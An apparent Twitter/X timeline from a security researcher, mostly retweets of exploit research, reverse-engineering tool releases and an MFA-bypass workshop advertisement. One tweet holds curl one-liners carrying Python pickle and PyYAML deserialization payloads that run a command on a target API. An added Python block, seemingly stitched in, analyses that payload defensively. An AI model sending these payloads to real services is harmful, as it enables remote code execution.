Combatting entropy since 1975

Joined August 2008
Pinned Tweet
I don't always Invoke-RestMethod, but when I do, I always forget to first do `{ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 }`
James Shewmaker retweeted
Wormable RCE in Windows DNS. Wormable RCE in SMBv3. Linux kernel exploitation via eBPF and io_uring. Windows 11 kernel LPE. Android kernel exploitation bypassing DAC, SELinux, and Knox. Full exploit chains with working PoCs. Heap grooming. ASLR bypass. CFG bypass. Type confusion. Kernel privilege escalation across three operating systems. All free. All published with full writeups. chomp.ie/ Author: @chompie1337 #ExploitDevelopment #ReverseEngineering #InfoSec
James Shewmaker retweeted
RSA private keys biased toward 0 bits can be factored by swapping a hard math problem for an easy one: integer factorization becomes polynomial factorization. We found hundreds of real-world keys vulnerable to this. Many traced to a type mismatch in CompleteFTP (now patched): each 32-bit limb got only 8 bits of randomness. We recovered 603 RSA and 74 DSA private keys. blog.trailofbits.com/2026/06…
James Shewmaker retweeted
MSSQL has always been a favorite target. Now it ships its own egress channel. @gershsec's latest research breaks down how SQL Server 2025's native AI features enable exfil, NTLM coercion, and C2 transport, all functioning as intended. Read more 👇 ghst.ly/4e2L3JX
James Shewmaker retweeted
Forgot to add this to the release notes, but nibble wildcard patterns also work now! `67 6? ?7 67`
IDA 9.4 Beta has been released. Some of the major new features include - Strings in the decompiler views will now FINALLY show up in the Strings view - A new "Pathfinder" view that shows you what code execution flow looks like - A new IDA protocol for sharing view states - Automatically detecting Rust version and packages and more docs.hex-rays.com/release-no…
James Shewmaker retweeted
Jun 10
🚨 Introducing "ITScape" (CVE-2026-46316) A Guest-to-Host Escape in KVM/arm64. Guest-side actions alone exploit a use-after-free to run root-privileged code in the host kernel. Unlike the commonly published QEMU escapes, the bug lives in in-kernel KVM, not QEMU. On a successful exploit, commands run with host kernel privilege rather than the privilege of a user process, threatening the guest-host isolation of multi-tenant arm64 public clouds. To the best of public knowledge, the first Guest-to-Host Escape Exploit targeting in-kernel KVM/arm64. Details: itscape.io
James Shewmaker retweeted
yeh so anyways this is a thing now (this is from yesterday, fwiw)
James Shewmaker retweeted
Along with extensive refactoring & numerous bug fixes, two new LBR commands have been added: The '!lbr' command: docs.hyperdbg.org/commands/e… The '!lbrdump' command: docs.hyperdbg.org/commands/e… Also, the script engine now includes 5 new functions to support LBR: docs.hyperdbg.org/commands/s…
I'm pleased to announce @HyperDbg v0.19. This release introduces a new module, HyperTrace, which brings hypervisor-level integration w/ tracing technologies such as Last Branch Record (LBR) & Processor Trace (PT). LBR is now available, with more coming. github.com/HyperDbg/HyperDbg…
James Shewmaker retweeted
Padding Oracle in MS-BKRP (BackuprKey RPC) “decrypt DPAPI v2/v3 domain backup blobs via distinguishable error codes on the DC's BackuprKey endpoint.” You need the masterkey in the user's roaming dir: Roaming\Microsoft\Protect\<SID>\<GUID> Creds: Bad-Jubies github.com/Bad-Jubies/Exploi…
James Shewmaker retweeted
New release: #PEbear 0.7.2: github.com/hasherezade/pe-be… - with important bugfixes and new features:
James Shewmaker retweeted
We helped FFmpeg find and fix 21 security vulnerabilities. In a 1.5M-line codebase, we spent just $1K in API costs. Some of these bugs had been hiding for decades. We also developed a PoC demonstrating an RCE primitive when FFmpeg processes RTSP streams. Full write-up: depthfirst.com/research/21-z…
Both Marginally and a Border-line issue ...
We got married on a Saturday in Canada. On Monday, we were emigrating to the United States. My new wife and I said goodbye to the movers, flew to the border, and I got pulled into the big glass room for "extra questioning". From her vantage point, she could see the immigration officer yelling, turning red, and waving his arms. She thought we were being denied entry... my Microsoft dreams crashing down right there. What she couldn’t hear was that he had already approved my work visa. He was furious because their copy of Microsoft Word was printing a blank page at the end of every document, and it was wasting paper, and he wanted it fixed. I helped adjust the margins. And so, after fixing the borders at the border, they released us to our new life in America.
James Shewmaker retweeted
For 19 years, GPS satellites have secretly broadcast a “numbers station” in their public signals. We decoded 12M messages: a 2011 flash where 31 of 32 satellites flipped in hours, “ghost” substrings repeating years apart, and a “TEXT” prefix spreading now. lsc-pagepro.mydigitalpublica…
James Shewmaker retweeted
RedSun: Exploiting Windows Defender's Remediation Workflow for Local Privilege Escalation Just showing some appreciation for @ChaoticEclipse0's excellent work. Hopefully this won't get us banned! open.substack.com/pub/calif/…
James Shewmaker retweeted
This Week on Brute Logic Parsing Confusion - Cloud Pipelines x.com/BRuteLogic/status/2058… Path Traversal Bypasses x.com/BRuteLogic/status/2059… Leaking httpOnly Cookies for ATO x.com/BRuteLogic/status/2059… Python RCE - Pickle & PyYAML x.com/BRuteLogic/status/2060… Check our timeline for more.
Python RCE Pickle `curl TARGET/api -H"Content-Type:application/json" -d'{"data":"gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"}'` PyYAML `curl TARGET/api/config -H"Content-Type:application/x-yaml" -d'!!python/object/new:subprocess.check_output [["id"]]'`
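On the defensive side of the pickle payload quoted above: an added example (not from the tweet or from Brute Logic) that statically lists the globals a pickle would import via pickletools, then refuses to load it unless every global is on an allow-list. The allow-list contents and the helper names are assumptions for this example.

```python
# Added example: inspect a pickle's opcode stream without executing it, then
# load it only through an Unpickler whose find_class is allow-listed.
import base64
import io
import pickle
import pickletools

# Payload exactly as posted in the tweet above; it decodes to a pickle whose
# REDUCE opcode would call subprocess.check_output(["id"]) on a plain loads().
PAYLOAD_B64 = "gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"

# Constructed allow-list: the only (module, name) pairs a deserializer may
# resolve. A real service lists just its own data classes here.
ALLOWED_GLOBALS = {("builtins", "set"), ("collections", "OrderedDict")}

STRING_OPS = ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE", "STRING",
              "SHORT_BINSTRING", "BINSTRING")


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Walk the opcodes (no execution) and return each (module, name) that a
    GLOBAL or STACK_GLOBAL opcode would import. STACK_GLOBAL takes its module
    and name from the two most recently pushed strings, which is how the
    standard pickler always emits it (MEMOIZE may sit in between)."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Resolves allow-listed globals only; anything else is an error."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    """Reject up front if the static scan finds a forbidden global, then load
    under RestrictedUnpickler as a second line of defence."""
    bad = [g for g in referenced_globals(data) if g not in ALLOWED_GLOBALS]
    if bad:
        raise pickle.UnpicklingError(f"refusing pickle referencing {bad}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


def classify(b64: str) -> tuple[bool, list]:
    """Return (accepted?, globals referenced) for a base64 pickle from a request."""
    data = base64.b64decode(b64)
    globs = referenced_globals(data)
    try:
        safe_loads(data)
        return True, globs
    except pickle.UnpicklingError:
        return False, globs


def benign_roundtrip(obj):
    """Round-trip a plain data object, which references no globals at all."""
    return safe_loads(pickle.dumps(obj))
```

The static scan is what a request filter or detection rule can log (module and name per pickle) without ever running the payload; the restricted unpickler covers pickles the scan could not fully parse.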
James Shewmaker retweeted
Released PseudoForge 0.1.0. An IDA Pro / Hex-Rays plugin built for Windows kernel driver analysis. It cleans up raw decompiler output with rule-based passes, WDK-backed API profiles, user-defined rules, and optional LLM rename assist that is kept behind deterministic validation. Current focus: - DriverEntry reconstruction hints - IRP / IOCTL dispatcher cleanup - CTL_CODE and NTSTATUS decoding - WDK API argument semantics - pool tag recovery - LIST_ENTRY traversal - CONTAINING_RECORD patterns - callback registration flows - common kernel cleanup paths This is still a very early release, so expect rough edges. 😆 repo: github.com/kernullist/Pseudo…
Device bound session credentials is going to be a lot of effort for not much return for public usage. It is still useful for hardening a private application, where re-registering/resetting accounts is going to be abnormal.
Replying to @dak_1001
Here’s the official link: workspaceupdates.googleblog.… Also covered in the Google Security Blog: blog.google/security/protect… Quick note on passkeys: they’re already doing something even stronger. Passkeys (WebAuthn/FIDO2) use private keys that are cryptographically bound to the device’s secure hardware (TPM, Secure Enclave, etc.) and never leave it. There’s no “session cookie” equivalent that can be stolen and replayed; the whole auth flow is proof-of-possession based and phishing-resistant by design. So in a way, they’ve had this protection baked in from the start.
The big problem is the huge number of public sites that must allow for cred reset/downgrades. It will continue to be "normal" to temporarily authenticate another way, which definitely will remain abusable.
June 3rd's 4hr workshop: MFA bypass with MiTM on DNS (ettercap), HTTPS (evilginx), coercion (mitmproxy), BitB (BeEF) all at the same time. Still time to register. I'm bringing loaner devices as well. 2026.hthackers.com/#/agenda?…